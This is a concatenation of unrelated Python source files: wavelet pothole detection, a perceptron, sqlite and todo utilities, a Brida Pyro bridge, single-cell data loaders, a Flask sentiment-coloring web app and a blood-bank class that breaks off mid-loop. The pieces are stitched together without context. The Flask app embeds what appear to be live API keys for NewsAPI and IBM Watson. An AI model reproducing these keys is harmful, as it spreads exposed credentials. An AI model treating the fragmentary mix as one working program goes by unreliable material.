self.cpp_info.defines.append("SOL_USING_CXX_LUA=1")
|
import matplotlib.pyplot as plt
import numpy as np
import os
import math as math
import wavelet
path = "Medicoes ponte dia 07-02-2019/"
files_in_dir = []
wav_levels = 2
n_cortes = 3
fator = 4
ocorrencias = []
for file_ in os.listdir(path):
file_str = str(file_)
if(file_str.endswith(".txt") or file_str.endswith(".csv")) and not file_str.endswith("readme.txt"):
files_in_dir.append(file_)
for index, file_ in enumerate(files_in_dir):
x,y,z = wavelet.readfile_xyz(path + file_, ' ')
inicio, fim = wavelet.readfile_limits(path + file_, ' ')
z = z[inicio:fim]
c = []
d = []
d_temp = list(z)
for i in xrange(wav_levels):
ca_temp, cd_temp = wavelet.cascade_wavelet(d_temp)
c.append(list(ca_temp))
d.append(list(cd_temp))
d_temp = cd_temp
#ultimo nivel
d_corte = c[wav_levels - 1]
cortes = []
cortes.append(list(d_corte))
fator_local = fator
sups = []
infs = []
complementares = []
for i in xrange(n_cortes):
lamb_sup, lamb_inf = wavelet.threshold(fator_local, d_corte)
sups.append(lamb_sup)
infs.append(lamb_inf)
d_corte, complementar = wavelet.corte_e_complementar_cascade(lamb_sup, lamb_inf, d_corte)
complementares.append(list(complementar))
cortes.append(list(d_corte))
fator_local = fator_local - 1
fig, ax = plt.subplots(1,1)
#ax.set_title("Wavelet nivel "+str(wav_levels)+" - "+str(n_cortes)+" cortes de threshold")
ax.set_title("HWT a trous algorithm - $D_{"+str(wav_levels)+"}$ $\lambda_1$ - " + file_[:-4])
ax.set_xlabel("Samples")
ax.set_ylabel("(G)")
ax.step(range(len(cortes[0])), cortes[0], label='$D_{'+str(wav_levels)+'}$', alpha=0.4 )
ax.step(range(len(cortes[1])), cortes[1], label='$D_{'+str(wav_levels)+'}$ - $\lambda_1$', color='green')
complementar = complementares[0]
check_var = True
for i, v in enumerate(complementar):
if(v[0] != 0 and check_var):
ax.scatter(v[1],v[0], s = 15, marker='x', color='black', label='Pothole position')
ax.text(v[1]+5,v[0], str(v[1]) + ', ' + str(v[0])[0:4])
check_var = False
nova_ocorrencia = (index,file_[:-4], v[0],v[1])
ocorrencias.append(nova_ocorrencia)
elif v[0] != 0 and not check_var:
nova_ocorrencia = (index,file_[:-4], v[0],v[1])
ocorrencias.append(nova_ocorrencia)
ax.scatter(v[1],v[0], s = 15, marker='x', color='black')
ax.text(v[1]+5,v[0], str(v[1]) + ', ' + str(v[0])[0:4])
for i in xrange(len(sups)):
draw_sup = [sups[i]] * len(cortes[0])
draw_inf = [infs[i]] * len(cortes[0])
if i == 0:
ax.plot(draw_sup, linestyle='-.', color='red', label='$\lambda_{sup1}$',alpha=0.7)
ax.plot(draw_inf, linestyle='-.', color='grey', label='$\lambda_{inf1}$', alpha=0.7)
# else:
# ax.plot(draw_sup, linestyle='-.', color='red')
# ax.plot(draw_inf, linestyle='-.', color='grey')
plt.legend()
plt.show()
#plt.savefig(path + "cascata-"+file_[:-4]+"wav"+str(wav_levels)+".png",dpi=500)
plt.close()
# newlist = [ ]
# for oc in ocorrencias:
# if oc[1] not in newlist and oc[1].startswith('ida'):
# newlist.append(oc[1])
# for oc in ocorrencias:
# if oc[1] not in newlist and oc[1].startswith('volta'):
# newlist.append(oc[1])
# print('size: ' + str(len(newlist)))
# for i in newlist:
# print(i)
|
import numpy as np
import matplotlib.pyplot as plt
import math
from scipy.special import comb
#Apolarity condition for P(x) and Q(x)
def apolarity(p, q):
sum=0
for i in range(p.order+1):
sum+=((-1)**i)*(p[i]*q[p.order-i])/(comb(p.order,i))
if sum==0:
return(sum)
else:
return(sum)
#degree of the polynomial P(z)
n=4
#roots of P(z)
roots=[[1,np.pi*(2)], [1,np.pi*(1)], [0,np.pi*(1)], [0,np.pi*(4/3)], [0.8,np.pi*(2/1)], [0.05,np.pi*(2/1)]]
z=[]
for i in range(n):
z.append(roots[i][0]*np.exp(1j*roots[i][1]))
p=np.poly1d(z, True)
pDash=np.polyder(p)
r=[1, -(2*z[0]+(z[0]+z[1]+z[2]+z[3])/4), -pDash[1]/6, -(pDash[0]/4)-z[0]*(pDash[1])]
q=np.poly1d(r)
print("Q(x)=")
print(q)
print("P'(x)=")
print(pDash)
print("sum=", "%.2f" % apolarity(pDash,q).real, "+", "%.2f" % apolarity(pDash,q).imag,"j")
for i in range(n-1):
print(np.roots(q))
print(abs(np.roots(q)[i]-z[0])) |
import db_helper
def main():
run = 1
db_helper.create_table()
while run:
print("\n")
print('1. Insert new task in todo list \n'
'2. View the todo list \n'
'3. Delete the task \n'
'4. exit \n')
x = input("Choose any of above option: ")
if x == "1":
task = str(input("Enter your todo: "))
db_helper.data_entry(task)
elif x == "2":
db_helper.printData()
elif x == "3":
indexToDelete = int(input("Enter the index of the task to be deleted: "))
db_helper.deleteTask(indexToDelete)
elif x == "4":
run = 0
else:
print("Please choose valid option")
db_helper.closeCursor()
if __name__ == '__main__': main()
|
import sqlite3
db_name = 'entreprise-sqlite.db'
# This function will connect to the sqlite3 database and then execute the sql script string use the cursor.executescript() function.
def execute_sql_script(sql_script_string):
# Connect to sqlite3 database.
conn = sqlite3.connect(db_name)
# Open the cursor.
cursor = conn.cursor()
# Run the sql script string.
cursor.executescript(sql_script_string)
# Commit the above operation.
conn.commit()
# Close the cursor object.
cursor.close()
# Close the connection object.
conn.close()
print('Execute sql script ' + sql_script_string + ' complete.')
# This function will read the sql script text from the external sql file and then run the sql script text.
def execute_external_sql_script_file(script_file_path):
# Open the external sql file.
file = open(script_file_path, 'r')
# Read out the sql script text in the file.
sql_script_string = file.read()
# Close the sql file object.
file.close()
# Execute the read out sql script string.
execute_sql_script(sql_script_string)
if __name__ == '__main__':
execute_external_sql_script_file('testRecrutement.sql') |
from rdflib import Namespace, Graph, Literal, RDF, URIRef
from rdfalchemy.rdfSubject import rdfSubject
from rdfalchemy import rdfSingle, rdfMultiple, rdfList
from brick.brickschema.org.schema._1_0_2.Brick.Average_Discharge_Air_Flow_Sensor import Average_Discharge_Air_Flow_Sensor
from brick.brickschema.org.schema._1_0_2.Brick.Average_Supply_Air_Flow_Sensor import Average_Supply_Air_Flow_Sensor
from brick.brickschema.org.schema._1_0_2.Brick.Discharge_Air_Flow_Sensor import Discharge_Air_Flow_Sensor
class HVAC_Average_Supply_Air_Flow_Sensor(Average_Discharge_Air_Flow_Sensor,Average_Supply_Air_Flow_Sensor,Discharge_Air_Flow_Sensor):
rdf_type = Namespace('https://brickschema.org/schema/1.0.2/Brick#').HVAC_Average_Supply_Air_Flow_Sensor
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by hubiao on 2017/5/12
from __future__ import unicode_literals
import logging,os,time
from logging.handlers import TimedRotatingFileHandler
import re
class Log(object):
def __init__(self):
self.ResultRoot= './TestResult'
if not os.path.exists(self.ResultRoot):
os.mkdir(self.ResultRoot)
date_time = time.strftime('%Y-%m-%d', time.localtime(time.time()))
self.ResultFile = self.ResultRoot + '/' + date_time
if not os.path.exists(self.ResultFile):
os.mkdir(self.ResultFile)
def set_logger(self):
self.logger = logging.getLogger('Bussiness')
self.logger.setLevel(logging.INFO)
filename = self.ResultFile + '/' + 'Bussiness_' + time.strftime('%H%M%S', time.localtime(time.time())) + '.log'
fh = logging.FileHandler(filename)
fh.setLevel(logging.INFO)
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d][%(levelname)s]:%(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
self.logger.addHandler(fh)
self.logger.addHandler(ch)
def initLogging(self,logFileName='applog'):
'''
初始化日志,日志按天分割,保存最近7天的日志记录
:param logFileName: 日志文件名称,默认为applog
:return: 无返回
'''
PATH = lambda p: os.path.abspath(
os.path.join(os.path.dirname(__file__), p)
)
log = logging.getLogger()
formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d][%(levelname)s]:%(message)s')
LogFileHander = TimedRotatingFileHandler(filename=PATH('../log/' + logFileName), when='D', interval=1,
backupCount=7)
LogFileHander.suffix = "%Y-%m-%d.log"
LogFileHander.extMatch = re.compile(r"^\d{4}-\d{2}-\d{2}.log$")
LogFileHander.setFormatter(formatter)
log.setLevel(logging.DEBUG)
log.addHandler(LogFileHander)
def d(self, msg, *args, **kwargs):
self.logger.debug(msg, *args, **kwargs)
def i(self, msg, *args, **kwargs):
self.logger.info(msg, *args, **kwargs)
def w(self, msg, *args, **kwargs):
self.logger.warning(msg, *args, **kwargs)
def c(self, msg, *args, **kwargs):
self.logger.critical(msg, *args, **kwargs)
def e(self, msg, *args, **kwargs):
self.logger.error(msg, *args, **kwargs)
|
# -*- coding: cp1252 -*-
import random
import pandas as pd
import matplotlib.pyplot as plt
def correl(df):
corr = df.corr()
t = 0.4
print "Matriz de Correlação\n\n",corr.iloc[-1].round(2)
listacolunas = list(corr.columns.values)
yx = len(listacolunas) -1
y = listacolunas[yx]
colunas = []
cort = corr[[y]]
colunas = ((cort[y] >= t)&(cort[y] != 1))|((cort[y]<= -t)&(cort[y] != -1))
dc = cort[colunas]
#print dc
select = list(dc.index)
select.append(y)
return select
class Perceptron:
def __init__(self, p,a):
self.pesos = [None] * p
for i in range(p):
r = random.randint(0, 1)
if r == 0:
self.pesos[i] = -1
else:
self.pesos[i] = 1
self.aprend = a
def teste(self, entradas):
# Realiza o calculo para definir o valor a ser acertado
s = 0
for i in range(len(entradas)):
s += entradas[i] * self.pesos[i]
if s < 0:
return -1
else:
return 1
def treino(self, entradas, resp):
# Treina o algoritmo
t = self.teste(entradas) # Teste
e = resp - t # Erro
#print e
for i in range(len(entradas)):
self.pesos[i] += e * entradas[i] * self.aprend
data = pd.read_csv("heart.csv")
select = correl(data)
print select
Train = pd.read_csv("Heart_Train.csv")
Train = Train[select]
#print Train
Train_Entry = Train[Train.columns[0:-1]]
Train_Resp = Train[Train.columns[-1]]
Test = pd.read_csv("Heart_Test.csv")
Test = Test[select]
#print Test
Test_Entry = Test[Test.columns[0:-1]]
Test_Resp = Test[Test.columns[-1]]
#print tudo,entrada,resp
tam = len(Train.columns)
aprend = 0
graf_X = []
graf_Y = []
best = 0
best_list = []
while(aprend<=1):
P = Perceptron(tam,aprend)
prev_list = []
for k in range(30):
i=0
j=len(Train_Entry.index) -1
while(i<j):
P.treino(Train_Entry.iloc[i],Train_Resp.iloc[i])
P.treino(Train_Entry.iloc[j],Train_Resp.iloc[j])
i+=1
j-=1
erros = 0
test_size = len(Test_Entry.index)
for i in range(test_size):
prev = P.teste(Test_Entry.iloc[i])
prev_list.append(prev)
if(prev!=Test_Resp.iloc[i]):
erros+=1
if(best<100 - ((100*erros)/test_size)):
best_list = prev_list
graf_Y.append(100 - ((100*erros)/test_size))
graf_X.append(aprend)
print "Taxa de Aprendizagem : ",aprend,"\nNumero de Erros : ",erros,"\nPorcentagem de Acerto :",100 - ((100*erros)/test_size),"%"
aprend+=0.1
plt.subplot(211)
plt.plot(graf_X,graf_Y)
plt.xlabel('Taxa de Aprendizagem')
plt.ylabel('% de Acerto')
plt.subplot(212)
plt.plot(Test_Entry,best_list)
plt.xlabel('Taxa de Aprendizagem')
plt.ylabel('% de Acerto')
plt.show()
|
# -*- coding: utf-8 -*-
import Pyro4
import sys
import importlib.util
import os
# reload(sys)
# sys.setdefaultencoding('utf-8')
class Unbuffered(object):
def __init__(self, stream):
self.stream = stream
def write(self, data):
self.stream.write(data)
self.stream.flush()
def writelines(self, datas):
self.stream.writelines(datas)
self.stream.flush()
def __getattr__(self, attr):
return getattr(self.stream, attr)
def path_import(absolute_path):
spec = importlib.util.spec_from_file_location(absolute_path, absolute_path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
return module
@Pyro4.expose
class BridaServicePyro:
def __init__(self, daemon, pyfile):
sys.path.append(os.path.dirname(pyfile))
self.daemon = daemon
self.pyfile = pyfile
self.script = path_import(self.pyfile)
def callexportfunction(self, methodName, args):
method_to_call = getattr(self.script, methodName)
# Take the Java list passed as argument and create a new variable list of argument
# (necessary for bridge Python - Java, I think)
s = []
for i in args:
s.append(i)
return_value = method_to_call(*s)
return return_value
@Pyro4.oneway
def shutdown(self):
print('shutting down...')
self.daemon.shutdown()
# Disable python buffering (cause issues when communicating with Java...)
sys.stdout = Unbuffered(sys.stdout)
sys.stderr = Unbuffered(sys.stderr)
host = sys.argv[1]
port = int(sys.argv[2])
daemon = Pyro4.Daemon(host=host, port=port)
# daemon = Pyro4.Daemon(host='127.0.0.1',port=9999)
bs = BridaServicePyro(daemon, sys.argv[3])
uri = daemon.register(bs, objectId='BridaServicePyro')
print("Ready.")
daemon.requestLoop()
|
import gzip
import numpy as np
import os.path
import scipy.sparse
from scipy.sparse import csr_matrix
from sklearn.preprocessing import normalize
import sys
from scanorama import merge_datasets
MIN_TRANSCRIPTS = 600
def load_tab(fname, max_genes=40000):
if fname.endswith('.gz'):
opener = gzip.open
else:
opener = open
with opener(fname, 'r') as f:
if fname.endswith('.gz'):
header = f.readline().decode('utf-8').rstrip().split('\t')
else:
header = f.readline().rstrip().split('\t')
cells = header[1:]
X = np.zeros((len(cells), max_genes))
genes = []
for i, line in enumerate(f):
if i > max_genes:
break
if fname.endswith('.gz'):
line = line.decode('utf-8')
fields = line.rstrip().split('\t')
genes.append(fields[0])
X[:, i] = [ float(f) for f in fields[1:] ]
return X[:, range(len(genes))], np.array(cells), np.array(genes)
def load_mtx(dname):
with open(dname + '/matrix.mtx', 'r') as f:
while True:
header = f.readline()
if not header.startswith('%'):
break
header = header.rstrip().split()
n_genes, n_cells = int(header[0]), int(header[1])
data, i, j = [], [], []
for line in f:
fields = line.rstrip().split()
data.append(float(fields[2]))
i.append(int(fields[1])-1)
j.append(int(fields[0])-1)
X = csr_matrix((data, (i, j)), shape=(n_cells, n_genes))
genes = []
with open(dname + '/genes.tsv', 'r') as f:
for line in f:
fields = line.rstrip().split()
genes.append(fields[1])
assert(len(genes) == n_genes)
return X, np.array(genes)
def load_h5(fname, genome='mm10'):
try:
import tables
except ImportError:
sys.stderr.write('Please install PyTables to read .h5 files: '
'https://www.pytables.org/usersguide/installation.html\n')
exit(1)
# Adapted from scanpy's read_10x_h5() method.
with tables.open_file(str(fname), 'r') as f:
try:
dsets = {}
for node in f.walk_nodes('/' + genome, 'Array'):
dsets[node.name] = node.read()
n_genes, n_cells = dsets['shape']
data = dsets['data']
if dsets['data'].dtype == np.dtype('int32'):
data = dsets['data'].view('float32')
data[:] = dsets['data']
X = csr_matrix((data, dsets['indices'], dsets['indptr']),
shape=(n_cells, n_genes))
genes = [ gene for gene in dsets['genes'].astype(str) ]
assert(len(genes) == n_genes)
assert(len(genes) == X.shape[1])
except tables.NoSuchNodeError:
raise Exception('Genome %s does not exist in this file.' % genome)
except KeyError:
raise Exception('File is missing one or more required datasets.')
return X, np.array(genes)
def process_tab(fname, min_trans=MIN_TRANSCRIPTS):
X, cells, genes = load_tab(fname)
gt_idx = [ i for i, s in enumerate(np.sum(X != 0, axis=1))
if s >= min_trans ]
X = X[gt_idx, :]
cells = cells[gt_idx]
if len(gt_idx) == 0:
print('Warning: 0 cells passed QC in {}'.format(fname))
if fname.endswith('.txt'):
cache_prefix = '.'.join(fname.split('.')[:-1])
elif fname.endswith('.txt.gz'):
cache_prefix = '.'.join(fname.split('.')[:-2])
elif fname.endswith('.tsv'):
cache_prefix = '.'.join(fname.split('.')[:-1])
elif fname.endswith('.tsv.gz'):
cache_prefix = '.'.join(fname.split('.')[:-2])
else:
sys.stderr.write('Tab files should end with ".txt" or ".tsv"\n')
exit(1)
cache_fname = cache_prefix + '.npz'
np.savez(cache_fname, X=X, genes=genes)
return X, cells, genes
def process_mtx(dname, min_trans=MIN_TRANSCRIPTS):
X, genes = load_mtx(dname)
gt_idx = [ i for i, s in enumerate(np.sum(X != 0, axis=1))
if s >= min_trans ]
X = X[gt_idx, :]
if len(gt_idx) == 0:
print('Warning: 0 cells passed QC in {}'.format(dname))
cache_fname = dname + '/tab.npz'
scipy.sparse.save_npz(cache_fname, X, compressed=False)
with open(dname + '/tab.genes.txt', 'w') as of:
of.write('\n'.join(genes) + '\n')
return X, genes
def process_h5(fname, min_trans=MIN_TRANSCRIPTS):
X, genes = load_h5(fname)
gt_idx = [ i for i, s in enumerate(np.sum(X != 0, axis=1))
if s >= min_trans ]
X = X[gt_idx, :]
if len(gt_idx) == 0:
print('Warning: 0 cells passed QC in {}'.format(fname))
if fname.endswith('.h5'):
cache_prefix = '.'.join(fname.split('.')[:-1])
cache_fname = cache_prefix + '.h5.npz'
scipy.sparse.save_npz(cache_fname, X, compressed=False)
with open(cache_prefix + '.h5.genes.txt', 'w') as of:
of.write('\n'.join(genes) + '\n')
return X, genes
def load_data(name):
if os.path.isfile(name + '.h5.npz'):
X = scipy.sparse.load_npz(name + '.h5.npz')
with open(name + '.h5.genes.txt') as f:
genes = np.array(f.read().rstrip().split())
elif os.path.isfile(name + '.npz'):
data = np.load(name + '.npz')
X = data['X']
genes = data['genes']
data.close()
elif os.path.isfile(name + '/tab.npz'):
X = scipy.sparse.load_npz(name + '/tab.npz')
with open(name + '/tab.genes.txt') as f:
genes = np.array(f.read().rstrip().split())
else:
sys.stderr.write('Could not find: {}\n'.format(name))
exit(1)
genes = np.array([ gene.upper() for gene in genes ])
return X, genes
def load_names(data_names, norm=True, log1p=False, verbose=True):
# Load datasets.
datasets = []
genes_list = []
n_cells = 0
for name in data_names:
X_i, genes_i = load_data(name)
if norm:
X_i = normalize(X_i, axis=1)
if log1p:
X_i = np.log1p(X_i)
X_i = csr_matrix(X_i)
datasets.append(X_i)
genes_list.append(genes_i)
n_cells += X_i.shape[0]
if verbose:
print('Loaded {} with {} genes and {} cells'.
format(name, X_i.shape[1], X_i.shape[0]))
if verbose:
print('Found {} cells among all datasets'
.format(n_cells))
return datasets, genes_list, n_cells
def save_datasets(datasets, genes, data_names, verbose=True,
truncate_neg=False):
for i in range(len(datasets)):
dataset = datasets[i].toarray()
name = data_names[i]
if truncate_neg:
dataset[dataset < 0] = 0
with open(name + '.scanorama_corrected.txt', 'w') as of:
# Save header.
of.write('Genes\t')
of.write('\t'.join(
[ 'cell' + str(cell) for cell in range(dataset.shape[0]) ]
) + '\n')
for g in range(dataset.shape[1]):
of.write(genes[g] + '\t')
of.write('\t'.join(
[ str(expr) for expr in dataset[:, g] ]
) + '\n')
def process(data_names, min_trans=MIN_TRANSCRIPTS):
for name in data_names:
if os.path.isdir(name):
process_mtx(name, min_trans=min_trans)
elif os.path.isfile(name) and name.endswith('.h5'):
process_h5(name, min_trans=min_trans)
elif os.path.isfile(name + '.h5'):
process_h5(name + '.h5', min_trans=min_trans)
elif os.path.isfile(name):
process_tab(name, min_trans=min_trans)
elif os.path.isfile(name + '.txt'):
process_tab(name + '.txt', min_trans=min_trans)
elif os.path.isfile(name + '.txt.gz'):
process_tab(name + '.txt.gz', min_trans=min_trans)
elif os.path.isfile(name + '.tsv'):
process_tab(name + '.tsv', min_trans=min_trans)
elif os.path.isfile(name + '.tsv.gz'):
process_tab(name + '.tsv.gz', min_trans=min_trans)
else:
sys.stderr.write('Warning: Could not find {}\n'.format(name))
continue
print('Successfully processed {}'.format(name))
if __name__ == '__main__':
from config import data_names
process(data_names)
|
from flask import Flask, render_template, url_for, request
import requests
import math
import ktrain
import numpy as np
#from sklearn.metrics import confusion_matrix
#from sklearn.metrics import f1_score
#from sklearn.metrics import accuracy_score
from ktrain import text
from tensorflow import keras
#import pickle
import os
#os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID";
#os.environ["CUDA_VISIBLE_DEVICES"]="0";
import sys
#from nltk.tokenize import sent_tokenize
import spacy
import pytextrank
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
#y_pred = predictor.predict("India must join hands with Central Asia for peace in Afghanistan")
#print(y_pred)
app = Flask(__name__)
modelno = int(sys.argv[1])
#modelno 1 -> NB-SVM
#modelno 2 -> bert language model
#modelno 3 -> mLSTM
#modelno 4 -> mLSTM (originally trained)
#Load Model
predictor = None
if modelno == 1:
predictor = ktrain.load_predictor('models/predictorNBSVM')
elif modelno == 2:
predictor = ktrain.load_predictor('models/predictorDistilBert')
elif modelno == 3:
predictor = ktrain.load_predictor('models/predictorMLSTM')
else:
pass
def color(score, pred):
# rgb(red, green, blue)
red = 0
green = 0
blue = 0
if pred == '0': #red
#https://stackoverflow.com/questions/5731863/mapping-a-numeric-range-onto-another
slope = -(255.0 - 120.0) / (1.0 - 0.05)
output = 255.0 + slope * (score - 0.05)
red = int(output)
elif pred == '1': #neutral
slope = -(255.0 - 120.0) / (0.05 - (-0.05))
output = 255.0 + slope * (score - (-0.05))
blue = int(output)
else:
slope = -(255.0 - 120.0) / (1.0 - 0.05)
output = 255.0 + slope * (score - 0.05)
green = int(output)
return str((red, green, blue))
def getPrediction(chunk):
#return predictor.predict(chunk)
sid = SentimentIntensityAnalyzer()
scores = sid.polarity_scores(chunk)
#print(scores)
if modelno == 1 or modelno ==2 or modelno == 3:
return predictor.predict(chunk), abs(scores['compound'])
if scores['compound'] >= 0.05:
return '2', abs(scores['compound'])
elif scores['compound'] >= -0.05:
return '1', abs(scores['compound'])
else:
return '0', abs(scores['compound'])
#text to sentences, simple !!!
def breakIntoSentences(incoming):
incoming = incoming.split('.')
newincoming = []
for i in incoming:
newincoming.append(i+'.')
return newincoming
#return sent_tokenize(incoming);
def breakIntoWordsAndPhrases(text):
nlp = spacy.load("en_core_web_sm")
tr = pytextrank.TextRank()
nlp.add_pipe(tr.PipelineComponent, name="textrank", last=True)
doc = nlp(text)
hashset = set()
for p in doc._.phrases:
for q in p.chunks:
hashset.add(str(q))
indextophrases = {}
for s in hashset:
indextophrases[text.find(s)] = s
i = 0
end = len(text)
chunks = []
string = ""
while i < end:
if i in indextophrases:
chunks.append(string)
chunks.append(indextophrases[i])
i += len(indextophrases[i])
string = ""
else:
string += text[i]
i += 1
if i==end: chunks.append(string)
return chunks
#text to chunks, based on words, phrases and zero shot classifier
def breakIntoChunks(text):
chunks = breakIntoWordsAndPhrases(text)
#now our chunks are ready based on words and phrases
#now we would be breaking into meaningful chunks using zeroshotclassifier
meaningfulchunks = []
i = 0
end = len(chunks)
labelprev = -1
labelcurr = -1
stringprev = ""
stringcurr = ""
score = 0.0
prevscore = 0.0
while i< end:
if i==0:
labelcurr, score = getPrediction(chunks[i])#predictor.predict(chunks[i])
stringcurr = chunks[i]
else:
labelcurr, score = getPrediction(stringprev + chunks[i])#predictor.predict(chunks[i])
stringcurr = stringprev + chunks[i]
if labelcurr != labelprev or score < prevscore:
meaningfulchunks.append(stringprev)
stringcurr = chunks[i]
#labelcurr = predictor.predict(chunks[i])
labelprev = labelcurr
stringprev = stringcurr
prevscore = score
i += 1
if i == end: meaningfulchunks.append(stringprev)
return meaningfulchunks
def buildTextToPrint(sentences):
texttoprint = ''
for sentence in sentences:
ypred, score = getPrediction(sentence) #predictor.predict(sentence)
#print(ypred, score)
texttoprint += '<font style = "font-family: Times New Roman; text-align: justify; font-size:25px; color: rgb'
if ypred == '0': texttoprint = texttoprint + color(score, ypred)+ '">' + sentence + '</font>'
elif ypred == '1': texttoprint = texttoprint + color(score, ypred)+ '">' + sentence + '</font>'
else: texttoprint = texttoprint + color(score, ypred) + '">' + sentence + '</font>'
return texttoprint
@app.route('/')
def index():
return render_template('index.html')
@app.route('/home')
def home():
return render_template('index.html')
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/contact')
def contact():
return render_template('contact.html')
@app.route('/readEnglish', methods=['GET', 'POST'])
def readEnglish():
return render_template('readEnglish.html')
@app.route('/readUrdu', methods=['GET', 'POST'])
def readUrdu():
return render_template('readUrdu.html')
@app.route('/menuEnglish', methods=['GET', 'POST'])
def menuEnglish():
return render_template('menuEnglish.html')
@app.route('/showExample', methods=['GET', 'POST'])
def showExample():
incoming = request.form['showExampleNumber'];
incoming = incoming.split(' ');
text = ""
texttoprint = ""
fname = 'news/' + incoming[0] + '/'+ incoming[1]+'.txt'
#f = open(fname, "r")
#text = bytes(f.read(), 'utf-8').decode('utf-8', 'ignore')
with open(fname, encoding="latin-1") as ff:
text = ff.read()
sentences = breakIntoChunks(text)
texttoprint = '<div id="anim">'
texttoprint += buildTextToPrint(sentences)
texttoprint += '</div>'
return render_template('showEnglish.html', pred=texttoprint)
@app.route('/exampleEnglish', methods=['GET', 'POST'])
def exampleEnglish():
incoming = request.form['exampleEnglish'];
if(incoming == 'Demo'):
return render_template('demo.html')
if(incoming == 'Army'):
return render_template('army.html')
if(incoming == 'Isro'):
return render_template('isro.html')
if(incoming == 'India'):
return render_template('india.html')
if(incoming == 'Drdo'):
return render_template('drdo.html')
return render_template('kashmir.html')
@app.route('/exampleUrdu', methods=['GET', 'POST'])
def exampleUrdu():
return render_template('exampleUrdu.html')
@app.route('/goLive', methods=['GET', 'POST'])
def goLive():
return render_template('goLive.html')
@app.route('/goLiveShow', methods=['GET', 'POST'])
def goLiveShow():
incoming = request.form['keyword'];
query = 'q='
query = query + incoming + '&'
url = ('http://newsapi.org/v2/everything?'+
query+
'from=2020-06-25&'
'sortBy=popularity&'
'apiKey=9b101bf919c24b0a8aea24a66ab1e1fc')
response = requests.get(url)
length = len(response.json()['articles'])
string = '<div id="anim">'
for i in range(min(10, length)):
string += buildTextToPrint(breakIntoChunks(response.json()['articles'][i]['title']))
string += '<br/>'
string += '</div>'
return render_template('goLiveShow.html', data = string)
@app.route('/showEnglish', methods=['GET', 'POST'])
def showEnglish():
incoming = request.form['newsArticle'];
dropdown = request.form['dropdown'];
incoming = incoming.strip()
sentences = []
if dropdown == "-1" or dropdown == "3":
sentences = breakIntoChunks(incoming)
elif dropdown == "1":
sentences = breakIntoSentences(incoming)
elif dropdown == "2":
sentences = breakIntoWordsAndPhrases(incoming)
texttoprint = '<div id="anim">'
texttoprint += buildTextToPrint(sentences)
texttoprint += '</div>'
#print(texttoprint)
return render_template('showEnglish.html', pred=texttoprint)
@app.route('/showUrdu', methods=['GET', 'POST'])
def showUrdu():
urdutext = request.form['urduArticle'];
urdutext = urdutext.strip()
urdutext = [st.strip() for st in urdutext.splitlines()]
urdutext = ' '.join(urdutext)
headers = {'Content-Type': 'application/json; charset=utf-8',}
params = (('version', '2018-05-01'),)
data = '{"text": ["'+urdutext+'"], "model_id":"ur-en"}'
response = requests.post('https://api.eu-gb.language-translator.watson.cloud.ibm.com/instances/33ae3fe4-df2e-4769-a2da-9b6f6433946f/v3/translate?version=2018-05-01', headers=headers, data=data.encode('utf-8'), auth=('apikey', 'Ygir-J0aZEpK6fava68HuLjpwpVPAUVycztQzfsPtP-N'))
if 'translations' in response.json().keys():
incoming = response.json()['translations'][0]['translation']
incoming = incoming.rstrip()
incoming = incoming.lstrip()
sentences = breakIntoChunks(incoming)
texttoprint = '<div id="anim">'
texttoprint += buildTextToPrint(sentences)
texttoprint += '</div>'
#print(urdutext+"<br/><br/>"+texttoprint)
return render_template('showUrdu.html', pred=urdutext+"<br/><br/>"+texttoprint)
else:
return render_template('showUrdu.html', pred=urdutext+"<br/><br/>"+"Invalid input")
if __name__=="__main__":
app.run()
|
l=10 # Global variables means anyone can use this
m=20 # Global variables means anyone can use this
def function1():
l=5 #local varialbe means only this function can use this
n=10 #local varialbe means only this function can use this
print(l,m,n)
'''here l is 5 so it can not take the value of global variable it but here m is not defined in this
function so it take the value of global variable'''
function1()
print(l,m) |
from nine import str
from PyFlow.UI.Tool.Tool import ShelfTool
from PyFlow.Packages.Maya.Tools import RESOURCES_DIR
from Qt import QtGui
class RunScriptTool(ShelfTool):
"""docstring for RunScriptTool."""
def __init__(self):
super(RunScriptTool, self).__init__()
@staticmethod
def toolTip():
return "Finds all scriptEntry nodes and executes them"
@staticmethod
def getIcon():
return QtGui.QIcon(RESOURCES_DIR + "runScript.png")
@staticmethod
def name():
return str("RunScriptTool")
def do(self):
entryPointNodes = self.pyFlowInstance.graphManager.get().getAllNodes(classNameFilters=["scriptEntry"])
for entryNode in entryPointNodes:
entryNode.compute()
|
from helper import build_tree
from helper import print_tree
def mirror_tree(root):
# post order swap
def swap_node(root):
if not root:
return
swap_node(root.left)
swap_node(root.right)
root.left, root.right = root.right, root.left
return swap_node(root)
if __name__ == '__main__':
tree = build_tree([20, 50, 200, 25, 75, '#', 300])
print_tree(tree)
print
mirror_tree(tree)
print_tree(tree)
|
from django.urls import path
from django.conf.urls import url, include
from django.contrib import admin
from django.contrib.auth import views
#from django.contrib.auth.views import login
from . import views
urlpatterns = [
#path('', views.index, name='index'),
path('review/', views.ReviewView.as_view(), name='review'),
path('manage/', views.Manage.as_view(), name='manage'),
path('', views.allReviews.as_view(), name='all-review'),
#path('map/', views.map, name='map'), Now in all-review
url(r'^login/$', views.Home, name='login'),
url(r'^account/logout/$', views.Logout, name='logout'),
]
|
import json
from datetime import datetime
class BECS:
possibleDonors = {
'A+': ['A+', 'A-', 'O+', 'O-'],
'O+': ['O+', 'O-'],
'B+': ['B+', 'B-', 'O+', 'O-'],
'AB+': ['O+', 'A+', 'B+', 'AB+', 'O-', 'A-', 'B-', 'AB-'],
'A-': ['A-', 'O-'],
'O-': ['O-'],
'B-': ['B-', 'O-'],
'AB-': ['O-', 'A-', 'B-', 'AB-']
}
bloodTypeDistribution = {
'A+': 34,
'O+': 32,
'B+': 17,
'AB+': 7,
'A-': 4,
'O-': 3,
'B-': 2,
'AB-': 1
}
def findLastFrozenID(self, frozen):
retval = 0
for packID in frozen.keys():
retval = int(packID)
return retval+1
def findLastCooledID(self, cooled):
retval = 0
for packID in cooled.keys():
retval = int(packID)
return retval+1
def getMostSuitableDonorsFromFrozen(self):
suitability = []
with open("api/data/counts.json", "r") as counts:
data = json.load(counts)
for i in range(8):
